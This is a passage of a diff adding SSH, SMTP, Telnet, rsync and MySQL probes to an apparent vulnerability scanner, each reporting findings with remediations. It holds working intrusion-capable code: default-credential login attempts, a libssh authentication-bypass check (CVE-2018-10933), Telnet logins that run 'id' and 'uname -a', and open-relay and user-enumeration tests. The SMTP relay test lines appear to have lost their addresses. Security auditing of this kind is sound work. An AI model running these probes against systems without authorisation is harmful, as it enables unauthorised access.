list(e.allowed_types) + except paramiko.AuthenticationException: + result["auth_methods"] = ["unknown"] + finally: + transport.close() + except Exception as e: + self.P(f"SSH auth enumeration failed on {target}:{port}: {e}", color='y') + + if "password" in result["auth_methods"]: + findings.append(Finding( + severity=Severity.MEDIUM, + title="SSH password authentication is enabled (prefer key-based auth).", + description="The SSH server allows password-based login, which is susceptible to brute-force attacks.", + evidence=f"Auth methods: {', '.join(result['auth_methods'])}", + remediation="Disable PasswordAuthentication in sshd_config and use key-based auth.", + owasp_id="A07:2021", + cwe_id="CWE-287", + confidence="certain", + )) + + # --- 3. Default credential check --- + accepted_creds = [] + + for username, password in _SSH_DEFAULT_CREDS: + try: + client = paramiko.SSHClient() + client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) + client.connect( + target, port=port, + username=username, password=password, + timeout=3, auth_timeout=3, + look_for_keys=False, allow_agent=False, + ) + accepted_creds.append(f"{username}:{password}") + client.close() + except paramiko.AuthenticationException: + continue + except Exception: + break # connection issue, stop trying + + # --- 4. Arbitrary credential acceptance test --- + random_user = f"probe_{random.randint(10000, 99999)}" + random_pass = f"rnd_{random.randint(10000, 99999)}" + try: + client = paramiko.SSHClient() + client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) + client.connect( + target, port=port, + username=random_user, password=random_pass, + timeout=3, auth_timeout=3, + look_for_keys=False, allow_agent=False, + ) + findings.append(Finding( + severity=Severity.CRITICAL, + title="SSH accepts arbitrary credentials", + description="Random credentials were accepted, indicating a dangerous misconfiguration or deceptive service.", + evidence=f"Accepted random creds {random_user}:{random_pass}", + remediation="Investigate immediately — authentication is non-functional.", + owasp_id="A07:2021", + cwe_id="CWE-287", + confidence="certain", + )) + client.close() + except paramiko.AuthenticationException: + pass + except Exception: + pass + + if accepted_creds: + result["accepted_credentials"] = accepted_creds + for cred in accepted_creds: + findings.append(Finding( + severity=Severity.CRITICAL, + title=f"SSH default credential accepted: {cred}", + description=f"The SSH server accepted a well-known default credential.", + evidence=f"Accepted credential: {cred}", + remediation="Change default passwords immediately and enforce strong credential policies.", + owasp_id="A07:2021", + cwe_id="CWE-798", + confidence="certain", + )) + + # --- 5. Cipher/KEX audit --- + cipher_findings, weak_labels = self._ssh_check_ciphers(target, port) + findings += cipher_findings + result["weak_algorithms"] = weak_labels + + # --- 6. CVE check on banner version --- + if result["banner"]: + ssh_lib, ssh_version = self._ssh_identify_library(result["banner"]) + if ssh_lib and ssh_version: + result["ssh_library"] = ssh_lib + result["ssh_version"] = ssh_version + findings += check_cves(ssh_lib, ssh_version) + + # --- 7. libssh auth bypass (CVE-2018-10933) --- + if ssh_lib == "libssh": + bypass = self._ssh_check_libssh_bypass(target, port) + if bypass: + findings.append(bypass) + + return probe_result(raw_data=result, findings=findings) + + # Patterns: (regex, product_name_for_cve_db) + _SSH_LIBRARY_PATTERNS = [ + (_re.compile(r'OpenSSH[_\s](\d+\.\d+(?:\.\d+)?)', _re.IGNORECASE), "openssh"), + (_re.compile(r'libssh[_\s-](\d+\.\d+(?:\.\d+)?)', _re.IGNORECASE), "libssh"), + (_re.compile(r'dropbear[_\s](\d+(?:\.\d+)*)', _re.IGNORECASE), "dropbear"), + (_re.compile(r'paramiko[_\s](\d+\.\d+(?:\.\d+)?)', _re.IGNORECASE), "paramiko"), + (_re.compile(r'Erlang[/\s](?:OTP[_/\s]*)?(\d+\.\d+(?:\.\d+)*)', _re.IGNORECASE), "erlang_ssh"), + ] + + def _ssh_identify_library(self, banner): + """Identify SSH library and version from banner string. + + Returns + ------- + tuple[str | None, str | None] + (product_name, version) — product_name matches cve_db product keys. + """ + for pattern, product in self._SSH_LIBRARY_PATTERNS: + m = pattern.search(banner) + if m: + return product, m.group(1) + return None, None + + def _ssh_check_ciphers(self, target, port): + """Audit SSH ciphers, KEX, and MACs via paramiko Transport. + + Returns + ------- + tuple[list[Finding], list[str]] + (findings, weak_algorithm_labels) — findings for probe_result, + labels for the raw-data ``weak_algorithms`` field. + """ + findings = [] + weak_labels = [] + _WEAK_CIPHERS = {"3des-cbc", "blowfish-cbc", "arcfour", "arcfour128", "arcfour256", + "aes128-cbc", "aes192-cbc", "aes256-cbc", "cast128-cbc"} + _WEAK_KEX = {"diffie-hellman-group1-sha1", "diffie-hellman-group14-sha1", + "diffie-hellman-group-exchange-sha1"} + + try: + transport = paramiko.Transport((target, port)) + transport.connect() + sec_opts = transport.get_security_options() + + ciphers = set(sec_opts.ciphers) if sec_opts.ciphers else set() + kex = set(sec_opts.kex) if sec_opts.kex else set() + key_types = set(sec_opts.key_types) if sec_opts.key_types else set() + + # RSA key size check — must be done before transport.close() + try: + remote_key = transport.get_remote_server_key() + if remote_key is not None and remote_key.get_name() == "ssh-rsa": + key_bits = remote_key.get_bits() + if key_bits < 2048: + findings.append(Finding( + severity=Severity.HIGH, + title=f"SSH RSA key is critically weak ({key_bits}-bit)", + description=f"The server's RSA host key is only {key_bits}-bit, which is trivially factorable.", + evidence=f"RSA key size: {key_bits} bits", + remediation="Generate a new RSA key of at least 3072 bits, or switch to Ed25519.", + owasp_id="A02:2021", + cwe_id="CWE-326", + confidence="certain", + )) + weak_labels.append(f"rsa_key: {key_bits}-bit") + elif key_bits < 3072: + findings.append(Finding( + severity=Severity.LOW, + title=f"SSH RSA key below NIST recommendation ({key_bits}-bit)", + description=f"The server's RSA host key is {key_bits}-bit. NIST recommends >=3072-bit after 2023.", + evidence=f"RSA key size: {key_bits} bits", + remediation="Generate a new RSA key of at least 3072 bits, or switch to Ed25519.", + owasp_id="A02:2021", + cwe_id="CWE-326", + confidence="certain", + )) + weak_labels.append(f"rsa_key: {key_bits}-bit") + except Exception: + pass + + transport.close() + + # DSA key detection + if "ssh-dss" in key_types: + findings.append(Finding( + severity=Severity.MEDIUM, + title="SSH DSA host key offered (ssh-dss)", + description="The SSH server offers DSA host keys, which are limited to 1024-bit and considered weak.", + evidence=f"Key types: {', '.join(sorted(key_types))}", + remediation="Remove DSA host keys and use Ed25519 or RSA (>=3072-bit) instead.", + owasp_id="A02:2021", + cwe_id="CWE-326", + confidence="certain", + )) + weak_labels.append("key_types: ssh-dss") + + weak_ciphers = ciphers & _WEAK_CIPHERS + weak_kex = kex & _WEAK_KEX + + if weak_ciphers: + cipher_list = ", ".join(sorted(weak_ciphers)) + findings.append(Finding( + severity=Severity.MEDIUM, + title=f"SSH weak ciphers: {cipher_list}", + description="The SSH server offers ciphers considered cryptographically weak.", + evidence=f"Weak ciphers offered: {cipher_list}", + remediation="Disable CBC-mode and RC4 ciphers in sshd_config.", + owasp_id="A02:2021", + cwe_id="CWE-326", + confidence="certain", + )) + weak_labels.append(f"ciphers: {cipher_list}") + + if weak_kex: + kex_list = ", ".join(sorted(weak_kex)) + findings.append(Finding( + severity=Severity.MEDIUM, + title=f"SSH weak key exchange: {kex_list}", + description="The SSH server offers key-exchange algorithms with known weaknesses.", + evidence=f"Weak KEX offered: {kex_list}", + remediation="Disable SHA-1 based key exchange algorithms in sshd_config.", + owasp_id="A02:2021", + cwe_id="CWE-326", + confidence="certain", + )) + weak_labels.append(f"kex: {kex_list}") + + except Exception as e: + self.P(f"SSH cipher audit failed on {target}:{port}: {e}", color='y') + + return findings, weak_labels + + def _ssh_check_libssh_bypass(self, target, port): + """Test CVE-2018-10933: libssh auth bypass via premature USERAUTH_SUCCESS. + + Affected versions: libssh 0.6.0–0.8.3 (fixed in 0.7.6 / 0.8.4). + The vulnerability allows a client to send SSH2_MSG_USERAUTH_SUCCESS (52) + instead of a proper auth request, and the server accepts it. + + Returns + ------- + Finding or None + """ + try: + transport = paramiko.Transport((target, port)) + transport.connect() + # SSH2_MSG_USERAUTH_SUCCESS = 52 (0x34) + msg = paramiko.Message() + msg.add_byte(b'\x34') + transport._send_message(msg) + try: + chan = transport.open_session(timeout=3) + if chan is not None: + chan.close() + transport.close() + return Finding( + severity=Severity.CRITICAL, + title="libssh auth bypass (CVE-2018-10933)", + description="Server accepted SSH2_MSG_USERAUTH_SUCCESS from client, " + "bypassing authentication entirely. Full shell access possible.", + evidence="Session channel opened after sending USERAUTH_SUCCESS.", + remediation="Upgrade libssh to >= 0.8.4 or >= 0.7.6.", + owasp_id="A07:2021", + cwe_id="CWE-287", + confidence="certain", + ) + except Exception: + pass + transport.close() + except Exception as e: + self.P(f"libssh bypass check failed on {target}:{port}: {e}", color='y') + return None + + def _service_info_smtp(self, target, port): # default port: 25 + """ + Assess SMTP service security: banner, EHLO features, STARTTLS, + authentication methods, open relay, and user enumeration. + + Checks performed (in order): + + 1. Banner grab — fingerprint MTA software and version. + 2. EHLO — enumerate server capabilities (SIZE, AUTH, STARTTLS, etc.). + 3. STARTTLS support — check for encryption. + 4. AUTH methods — detect available authentication mechanisms. + 5. Open relay test — attempt MAIL FROM / RCPT TO without auth. + 6. VRFY / EXPN — test user enumeration commands. + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + Port being probed. + + Returns + ------- + dict + Structured findings. + """ + import smtplib + + findings = [] + result = { + "banner": None, + "server_hostname": None, + "max_message_size": None, + "auth_methods": [], + } + + # --- 1. Connect and grab banner --- + try: + smtp = smtplib.SMTP(timeout=5) + code, msg = smtp.connect(target, port) + result["banner"] = f"{code} {msg.decode(errors='replace')}" + except Exception as e: + return probe_error(target, port, "SMTP", e) + + # --- 2. EHLO — server capabilities --- + identity = getattr(self, 'scanner_identity', 'probe.redmesh.local') + ehlo_features = [] + try: + code, msg = smtp.ehlo(identity) + if code == 250: + for line in msg.decode(errors="replace").split("\n"): + feat = line.strip() + if feat: + ehlo_features.append(feat) + except Exception: + # Fallback to HELO + try: + smtp.helo(identity) + except Exception: + pass + + # Parse meaningful fields from EHLO response + for idx, feat in enumerate(ehlo_features): + upper = feat.upper() + if idx == 0 and " Hello " in feat: + # First line is the server greeting: "hostname Hello client [ip]" + result["server_hostname"] = feat.split()[0] + if upper.startswith("SIZE "): + try: + size_bytes = int(feat.split()[1]) + result["max_message_size"] = f"{size_bytes // (1024*1024)}MB" + except (ValueError, IndexError): + pass + if upper.startswith("AUTH "): + result["auth_methods"] = feat.split()[1:] + + # --- 2b. Banner timezone extraction --- + banner_text = result["banner"] or "" + _tz_match = _re.search(r'([+-]\d{4})\s*$', banner_text) + if _tz_match: + self._emit_metadata("timezone_hints", {"offset": _tz_match.group(1), "source": f"smtp:{port}"}) + + # --- 2c. Banner / hostname information disclosure --- + # Extract MTA version from banner (e.g. "Exim 4.97", "Postfix", "Sendmail 8.x") + version_match = _re.search( + r"(Exim|Postfix|Sendmail|Microsoft ESMTP|hMailServer|Haraka|OpenSMTPD)" + r"[\s/]*([0-9][0-9.]*)?", + banner_text, _re.IGNORECASE, + ) + if version_match: + mta = version_match.group(0).strip() + findings.append(Finding( + severity=Severity.LOW, + title=f"SMTP banner discloses MTA software: {mta} (aids CVE lookup).", + description="The SMTP banner reveals the mail transfer agent software and version.", + evidence=f"Banner: {banner_text[:120]}", + remediation="Remove or genericize the SMTP banner to hide MTA version details.", + owasp_id="A05:2021", + cwe_id="CWE-200", + confidence="certain", + )) + + # CVE check on extracted MTA version + _smtp_product_map = {'exim': 'exim', 'postfix': 'postfix', 'opensmtpd': 'opensmtpd'} + _mta_version = version_match.group(2) if version_match and version_match.group(2) else None + _mta_name = version_match.group(1).lower() if version_match else None + + # If banner lacks version (common with OpenSMTPD), try HELP command + if version_match and not _mta_version: + try: + code, msg = smtp.docmd("HELP") + help_text = msg.decode(errors="replace") if isinstance(msg, bytes) else str(msg) + _help_ver = _re.search(r'(\d+\.\d+(?:\.\d+)*(?:p\d+)?)', help_text) + if _help_ver: + _mta_version = _help_ver.group(1) + except Exception: + pass + + if _mta_name and _mta_version: + _cve_product = _smtp_product_map.get(_mta_name) + if _cve_product: + findings += check_cves(_cve_product, _mta_version) + + if result["server_hostname"]: + # Check if hostname reveals container/internal info + hostname = result["server_hostname"] + if _re.search(r"[0-9a-f]{12}", hostname): + self._emit_metadata("container_ids", {"id": hostname, "source": f"smtp:{port}"}) + findings.append(Finding( + severity=Severity.LOW, + title=f"SMTP hostname leaks container ID: {hostname} (infrastructure disclosure).", + description="The EHLO response reveals a container ID or internal hostname.", + evidence=f"Hostname: {hostname}", + remediation="Configure the SMTP server to use a proper FQDN instead of the container ID.", + owasp_id="A05:2021", + cwe_id="CWE-200", + confidence="firm", + )) + if _re.match(r'^[a-z0-9-]+-[a-z0-9]{8,10}$', hostname): + self._emit_metadata("container_ids", {"id": hostname, "source": f"smtp_k8s:{port}"}) + findings.append(Finding( + severity=Severity.LOW, + title=f"SMTP hostname matches Kubernetes pod name pattern: {hostname}", + description="The EHLO hostname resembles a Kubernetes pod name (deployment-replicaset-podid).", + evidence=f"Hostname: {hostname}", + remediation="Configure the SMTP server to use a proper FQDN instead of the pod name.", + owasp_id="A05:2021", + cwe_id="CWE-200", + confidence="firm", + )) + if hostname.endswith('.internal'): + self._emit_metadata("container_ids", {"id": hostname, "source": f"smtp_internal:{port}"}) + findings.append(Finding( + severity=Severity.LOW, + title=f"SMTP hostname uses cloud-internal DNS suffix: {hostname}", + description="The EHLO hostname ends with '.internal', indicating AWS/GCP internal DNS.", + evidence=f"Hostname: {hostname}", + remediation="Configure the SMTP server to use a public FQDN instead of internal DNS.", + owasp_id="A05:2021", + cwe_id="CWE-200", + confidence="firm", + )) + + # --- 3. STARTTLS --- + starttls_supported = any("STARTTLS" in f.upper() for f in ehlo_features) + if not starttls_supported: + try: + code, msg = smtp.docmd("STARTTLS") + if code == 220: + starttls_supported = True + except Exception: + pass + + if not starttls_supported: + findings.append(Finding( + severity=Severity.MEDIUM, + title="SMTP does not support STARTTLS (credentials sent in cleartext).", + description="The SMTP server does not offer STARTTLS, leaving credentials and mail unencrypted.", + evidence="STARTTLS not listed in EHLO features and STARTTLS command rejected.", + remediation="Enable STARTTLS support on the SMTP server.", + owasp_id="A02:2021", + cwe_id="CWE-319", + confidence="certain", + )) + + # --- 4. AUTH without credentials --- + if result["auth_methods"]: + try: + code, msg = smtp.docmd("AUTH LOGIN") + if code == 235: + findings.append(Finding( + severity=Severity.HIGH, + title="SMTP AUTH LOGIN accepted without credentials.", + description="The SMTP server accepted AUTH LOGIN without providing actual credentials.", + evidence=f"AUTH LOGIN returned code {code}.", + remediation="Fix AUTH configuration to require valid credentials.", + owasp_id="A07:2021", + cwe_id="CWE-287", + confidence="certain", + )) + except Exception: + pass + + # --- 5. Open relay test --- + try: + smtp.rset() + except Exception: + try: + smtp.quit() + except Exception: + pass + try: + smtp = smtplib.SMTP(target, port, timeout=5) + smtp.ehlo(identity) + except Exception: + smtp = None + + if smtp: + try: + code_from, _ = smtp.docmd(f"MAIL FROM:") + if code_from == 250: + code_rcpt, _ = smtp.docmd("RCPT TO:") + if code_rcpt == 250: + findings.append(Finding( + severity=Severity.HIGH, + title="SMTP open relay detected (accepts mail to external domains without auth).", + description="The SMTP server relays mail to external domains without authentication.", + evidence="RCPT TO: accepted (code 250).", + remediation="Configure SMTP relay restrictions to require authentication.", + owasp_id="A01:2021", + cwe_id="CWE-284", + confidence="certain", + )) + smtp.docmd("RSET") + except Exception: + pass + + # --- 6. VRFY / EXPN --- + if smtp: + for cmd_name in ("VRFY", "EXPN"): + try: + code, msg = smtp.docmd(cmd_name, "root") + if code in (250, 251, 252): + findings.append(Finding( + severity=Severity.MEDIUM, + title=f"SMTP {cmd_name} command enabled (user enumeration possible).", + description=f"The {cmd_name} command can be used to enumerate valid users on the system.", + evidence=f"{cmd_name} root returned code {code}.", + remediation=f"Disable the {cmd_name} command in the SMTP server configuration.", + owasp_id="A01:2021", + cwe_id="CWE-203", + confidence="certain", + )) + except Exception: + pass + + if smtp: + try: + smtp.quit() + except Exception: + pass + + return probe_result(raw_data=result, findings=findings) + + def _service_info_telnet(self, target, port): # default port: 23 + """ + Assess Telnet service security: banner, negotiation options, default + credentials, privilege level, system fingerprint, and credential validation. + + Checks performed (in order): + + 1. Banner grab and IAC option parsing. + 2. Default credential check — try common user:pass combos. + 3. Privilege escalation check — report if root shell is obtained. + 4. System fingerprint — run ``id`` and ``uname -a`` on successful login. + 5. Arbitrary credential acceptance test. + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + Port being probed. + + Returns + ------- + dict + Structured findings. + """ + import time as _time + + findings = [] + result = { + "banner": None, + "negotiation_options": [], + "accepted_credentials": [], + "system_info": None, + } + + findings.append(Finding( + severity=Severity.MEDIUM, + title="Telnet service is running (unencrypted remote access).", + description="Telnet transmits all data including credentials in cleartext.", + evidence=f"Telnet port {port} is open on {target}.", + remediation="Replace Telnet with SSH for encrypted remote access.", + owasp_id="A02:2021", + cwe_id="CWE-319", + confidence="certain", + )) + + # --- 1. Banner grab + IAC negotiation parsing --- + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(5) + sock.connect((target, port)) + raw = sock.recv(2048) + sock.close() + except Exception as e: + return probe_error(target, port, "Telnet", e) + + # Parse IAC sequences + iac_options = [] + cmd_names = {251: "WILL", 252: "WONT", 253: "DO", 254: "DONT"} + opt_names = { + 0: "BINARY", 1: "ECHO", 3: "SGA", 5: "STATUS", + 24: "TERMINAL_TYPE", 31: "WINDOW_SIZE", 32: "TERMINAL_SPEED", + 33: "REMOTE_FLOW", 34: "LINEMODE", 36: "ENVIRON", 39: "NEW_ENVIRON", + } + i = 0 + text_parts = [] + while i < len(raw): + if raw[i] == 0xFF and i + 2 < len(raw): + cmd = cmd_names.get(raw[i + 1], f"CMD_{raw[i+1]}") + opt = opt_names.get(raw[i + 2], f"OPT_{raw[i+2]}") + iac_options.append(f"{cmd} {opt}") + i += 3 + else: + if 32 <= raw[i] < 127: + text_parts.append(chr(raw[i])) + i += 1 + + banner_text = "".join(text_parts).strip() + if banner_text: + result["banner"] = banner_text + elif iac_options: + result["banner"] = "(IAC negotiation only, no text banner)" + else: + result["banner"] = "(no banner)" + result["negotiation_options"] = iac_options + + # --- 2–4. Default credential check with system fingerprint --- + def _try_telnet_login(user, passwd): + """Attempt Telnet login, return (success, uid_line, uname_line).""" + try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.settimeout(5) + s.connect((target, port)) + + # Read until login prompt + buf = b"" + deadline = _time.time() + 5 + while _time.time() < deadline: + try: + chunk = s.recv(1024) + if not chunk: + break + buf += chunk + if b"login:" in buf.lower() or b"username:" in buf.lower(): + break + except socket.timeout: + break + + if b"login:" not in buf.lower() and b"username:" not in buf.lower(): + s.close() + return False, None, None + + s.sendall(user.encode() + b"\n") + + # Read until password prompt + buf = b"" + deadline = _time.time() + 5 + while _time.time() < deadline: + try: + chunk = s.recv(1024) + if not chunk: + break + buf += chunk + if b"assword:" in buf: + break + except socket.timeout: + break + + if b"assword:" not in buf: + s.close() + return False, None, None + + s.sendall(passwd.encode() + b"\n") + _time.sleep(1.5) + + # Read response + resp = b"" + try: + while True: + chunk = s.recv(4096) + if not chunk: + break + resp += chunk + except socket.timeout: + pass + + resp_text = resp.decode("utf-8", errors="replace") + + # Check for login failure indicators + fail_indicators = ["incorrect", "failed", "denied", "invalid", "login:"] + if any(ind in resp_text.lower() for ind in fail_indicators): + s.close() + return False, None, None + + # Login succeeded — try to get system info + uid_line = None + uname_line = None + try: + s.sendall(b"id\n") + _time.sleep(0.5) + id_resp = s.recv(2048).decode("utf-8", errors="replace") + for line in id_resp.replace("\r\n", "\n").split("\n"): + cleaned = line.strip() + # Remove ANSI/control sequences + import re + cleaned = re.sub(r"\x1b\[[0-9;]*[a-zA-Z]", "", cleaned) + if "uid=" in cleaned: + uid_line = cleaned + break + except Exception: + pass + + try: + s.sendall(b"uname -a\n") + _time.sleep(0.5) + uname_resp = s.recv(2048).decode("utf-8", errors="replace") + for line in uname_resp.replace("\r\n", "\n").split("\n"): + cleaned = line.strip() + import re + cleaned = re.sub(r"\x1b\[[0-9;]*[a-zA-Z]", "", cleaned) + if "linux" in cleaned.lower() or "unix" in cleaned.lower() or "darwin" in cleaned.lower(): + uname_line = cleaned + break + except Exception: + pass + + s.close() + return True, uid_line, uname_line + + except Exception: + return False, None, None + + system_info_captured = False + for user, passwd in _TELNET_DEFAULT_CREDS: + success, uid_line, uname_line = _try_telnet_login(user, passwd) + if success: + result["accepted_credentials"].append(f"{user}:{passwd}") + findings.append(Finding( + severity=Severity.CRITICAL, + title=f"Telnet default credential accepted: {user}:{passwd}", + description="The Telnet server accepted a well-known default credential.", + evidence=f"Accepted credential: {user}:{passwd}", + remediation="Change default passwords immediately and enforce strong credential policies.", + owasp_id="A07:2021", + cwe_id="CWE-798", + confidence="certain", + )) + # Check for root access + if uid_line and "uid=0" in uid_line: + findings.append(Finding( + severity=Severity.CRITICAL, + title=f"Root shell access via Telnet with {user}:{passwd}.", + description="Root-level shell access was obtained over an unencrypted Telnet session.", + evidence=f"uid=0 in id output: {uid_line}", + remediation="Disable root login via Telnet; use SSH with key-based auth instead.", + owasp_id="A07:2021", + cwe_id="CWE-250", + confidence="certain", + )) + + # Capture system info once + if not system_info_captured and (uid_line or uname_line): + parts = [] + if uid_line: + parts.append(uid_line) + if uname_line: + parts.append(uname_line) + result["system_info"] = " | ".join(parts) + system_info_captured = True + + # --- 5. Arbitrary credential acceptance test --- + import string as _string + ruser = "".join(random.choices(_string.ascii_lowercase, k=8)) + rpass = "".join(random.choices(_string.ascii_letters + _string.digits, k=12)) + success, _, _ = _try_telnet_login(ruser, rpass) + if success: + findings.append(Finding( + severity=Severity.CRITICAL, + title="Telnet accepts arbitrary credentials", + description="Random credentials were accepted, indicating a dangerous misconfiguration or deceptive service.", + evidence=f"Accepted random creds {ruser}:{rpass}", + remediation="Investigate immediately — authentication is non-functional.", + owasp_id="A07:2021", + cwe_id="CWE-287", + confidence="certain", + )) + + return probe_result(raw_data=result, findings=findings) + + + def _service_info_rsync(self, target, port): # default port: 873 + """ + Rsync service probe: version handshake, module enumeration, auth check. + + Checks performed: + + 1. Banner grab — extract rsync protocol version. + 2. Module enumeration — ``#list`` to discover available modules. + 3. Auth check — connect to each module to test unauthenticated access. + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + Port being probed. + + Returns + ------- + dict + Structured findings. + """ + findings = [] + raw = {"version": None, "modules": []} + + # --- 1. Connect and receive banner --- + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(3) + sock.connect((target, port)) + banner = sock.recv(256).decode("utf-8", errors="ignore").strip() + except Exception as e: + return probe_error(target, port, "rsync", e) + + if not banner.startswith("@RSYNCD:"): + try: + sock.close() + except Exception: + pass + findings.append(Finding( + severity=Severity.INFO, + title=f"Port {port} open but no rsync banner", + description=f"Expected @RSYNCD banner, got: {banner[:80]}", + confidence="tentative", + )) + return probe_result(raw_data=raw, findings=findings) + + # Extract protocol version + proto_version = banner.split(":", 1)[1].strip().split()[0] if ":" in banner else None + raw["version"] = proto_version + + findings.append(Finding( + severity=Severity.LOW, + title=f"Rsync service detected (protocol {proto_version})", + description=f"Rsync daemon is running on {target}:{port}.", + evidence=f"Banner: {banner}", + remediation="Restrict rsync access to trusted networks; require authentication for all modules.", + cwe_id="CWE-200", + confidence="certain", + )) + + # --- 2. Module enumeration --- + try: + # Send matching version handshake + list request + sock.sendall(f"@RSYNCD: {proto_version}\n".encode()) + sock.sendall(b"#list\n") + # Read module listing until @RSYNCD: EXIT + module_data = b"" + while True: + chunk = sock.recv(4096) + if not chunk: + break + module_data += chunk + if b"@RSYNCD: EXIT" in module_data: + break + sock.close() + + modules = [] + for line in module_data.decode("utf-8", errors="ignore").splitlines(): + line = line.strip() + if line.startswith("@RSYNCD:") or not line: + continue + # Format: "module_name\tdescription" or just "module_name" + parts = line.split("\t", 1) + mod_name = parts[0].strip() + mod_desc = parts[1].strip() if len(parts) > 1 else "" + if mod_name: + modules.append({"name": mod_name, "description": mod_desc}) + + raw["modules"] = modules + + if modules: + mod_names = ", ".join(m["name"] for m in modules) + findings.append(Finding( + severity=Severity.HIGH, + title=f"Rsync module enumeration successful: {mod_names}", + description=f"Rsync on {target}:{port} exposes {len(modules)} module(s). " + "Exposed modules may allow file read/write.", + evidence=f"Modules: {mod_names}", + remediation="Restrict module listing and require authentication for all rsync modules.", + owasp_id="A01:2021", + cwe_id="CWE-200", + confidence="certain", + )) + except Exception as e: + self.P(f"Rsync module enumeration failed on {target}:{port}: {e}", color='y') + try: + sock.close() + except Exception: + pass + + # --- 3. Test unauthenticated access per module --- + for mod in raw["modules"]: + try: + sock2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock2.settimeout(3) + sock2.connect((target, port)) + sock2.recv(256) # banner + sock2.sendall(f"@RSYNCD: {proto_version}\n".encode()) + sock2.sendall(f"{mod['name']}\n".encode()) + resp = sock2.recv(4096).decode("utf-8", errors="ignore") + sock2.close() + + if "@RSYNCD: OK" in resp: + findings.append(Finding( + severity=Severity.CRITICAL, + title=f"Rsync module '{mod['name']}' accessible without authentication", + description=f"Module '{mod['name']}' on {target}:{port} allows unauthenticated access. " + "An attacker can read or write arbitrary files within this module.", + evidence=f"Connected to module '{mod['name']}', received @RSYNCD: OK", + remediation=f"Add 'auth users' and 'secrets file' to the [{mod['name']}] section in rsyncd.conf.", + owasp_id="A01:2021", + cwe_id="CWE-284", + confidence="certain", + )) + elif "@ERROR" in resp and "auth" in resp.lower(): + raw["modules"] = [ + {**m, "auth_required": True} if m["name"] == mod["name"] else m + for m in raw["modules"] + ] + except Exception: + pass + + return probe_result(raw_data=raw, findings=findings) diff --git a/extensions/business/cybersec/red_mesh/worker/service/database.py b/extensions/business/cybersec/red_mesh/worker/service/database.py new file mode 100644 index 00000000..ea38f889 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/worker/service/database.py @@ -0,0 +1,1305 @@ +import re as _re +import socket +import struct + +import requests + +from ...findings import Finding, Severity, probe_result, probe_error +from ...cve_db import check_cves +from ._base import _ServiceProbeBase + + +class _ServiceDatabaseMixin(_ServiceProbeBase): + """MySQL, Redis, MSSQL, PostgreSQL, Memcached, MongoDB, CouchDB and InfluxDB probes.""" + + def _service_info_mysql(self, target, port): # default port: 3306 + """ + MySQL handshake probe: extract version, auth plugin, and check CVEs. + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + Port being probed. + + Returns + ------- + dict + Structured findings. + """ + findings = [] + raw = {"version": None, "auth_plugin": None} + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(3) + sock.connect((target, port)) + data = sock.recv(256) + sock.close() + + if data and len(data) > 4: + # MySQL protocol: first byte of payload is protocol version (0x0a = v10) + pkt_payload = data[4:] # skip 3-byte length + 1-byte seq + if pkt_payload and pkt_payload[0] == 0x0a: + version = pkt_payload[1:].split(b'\x00')[0].decode('utf-8', errors='ignore') + raw["version"] = version + + # Extract auth plugin name (at end of handshake after capabilities/salt) + try: + parts = pkt_payload.split(b'\x00') + if len(parts) >= 2: + last = parts[-2].decode('utf-8', errors='ignore') if parts[-1] == b'' else parts[-1].decode('utf-8', errors='ignore') + if 'mysql_native' in last or 'caching_sha2' in last or 'sha256' in last: + raw["auth_plugin"] = last + except Exception: + pass + + findings.append(Finding( + severity=Severity.LOW, + title=f"MySQL version disclosed: {version}", + description=f"MySQL {version} handshake received on {target}:{port}.", + evidence=f"version={version}, auth_plugin={raw['auth_plugin']}", + remediation="Restrict MySQL to trusted networks; consider disabling version disclosure.", + confidence="certain", + )) + + # Salt entropy check — extract 20-byte auth scramble from handshake + try: + import math + # After version null-terminated string: 4 bytes thread_id + 8 bytes salt1 + after_version = pkt_payload[1:].split(b'\x00', 1)[1] + if len(after_version) >= 12: + salt1 = after_version[4:12] # 8 bytes after thread_id + # Salt part 2: after capabilities(2)+charset(1)+status(2)+caps_upper(2)+auth_len(1)+reserved(10) + salt2 = b'' + if len(after_version) >= 31: + salt2 = after_version[31:43].rstrip(b'\x00') + full_salt = salt1 + salt2 + if len(full_salt) >= 8: + # Shannon entropy + byte_counts = {} + for b in full_salt: + byte_counts[b] = byte_counts.get(b, 0) + 1 + entropy = 0.0 + n = len(full_salt) + for count in byte_counts.values(): + p = count / n + if p > 0: + entropy -= p * math.log2(p) + raw["salt_entropy"] = round(entropy, 2) + if entropy < 2.0: + findings.append(Finding( + severity=Severity.HIGH, + title=f"MySQL salt entropy critically low ({entropy:.2f} bits)", + description="The authentication scramble has abnormally low entropy, " + "suggesting a non-standard or deceptive MySQL service.", + evidence=f"salt_entropy={entropy:.2f}, salt_hex={full_salt.hex()[:40]}", + remediation="Investigate this MySQL instance — authentication randomness is insufficient.", + cwe_id="CWE-330", + confidence="firm", + )) + except Exception: + pass + + # CVE check + findings += check_cves("mysql", version) + else: + raw["protocol_byte"] = pkt_payload[0] if pkt_payload else None + findings.append(Finding( + severity=Severity.INFO, + title="MySQL port open (non-standard handshake)", + description=f"Port {port} responded but protocol byte is not 0x0a.", + confidence="tentative", + )) + else: + findings.append(Finding( + severity=Severity.INFO, + title="MySQL port open (no banner)", + description=f"No handshake data received on {target}:{port}.", + confidence="tentative", + )) + except Exception as e: + return probe_error(target, port, "MySQL", e) + + return probe_result(raw_data=raw, findings=findings) + + def _service_info_mysql_creds(self, target, port): # default port: 3306 + """ + MySQL default credential testing (opt-in via active_auth feature group). + + Attempts mysql_native_password auth with a small list of default credentials. + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + Port being probed. + + Returns + ------- + dict + Structured findings. + """ + import hashlib + + findings = [] + raw = {"tested_credentials": 0, "accepted_credentials": []} + creds = [("root", ""), ("root", "root"), ("root", "password")] + + for username, password in creds: + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(3) + sock.connect((target, port)) + data = sock.recv(256) + + if not data or len(data) < 4: + sock.close() + continue + + 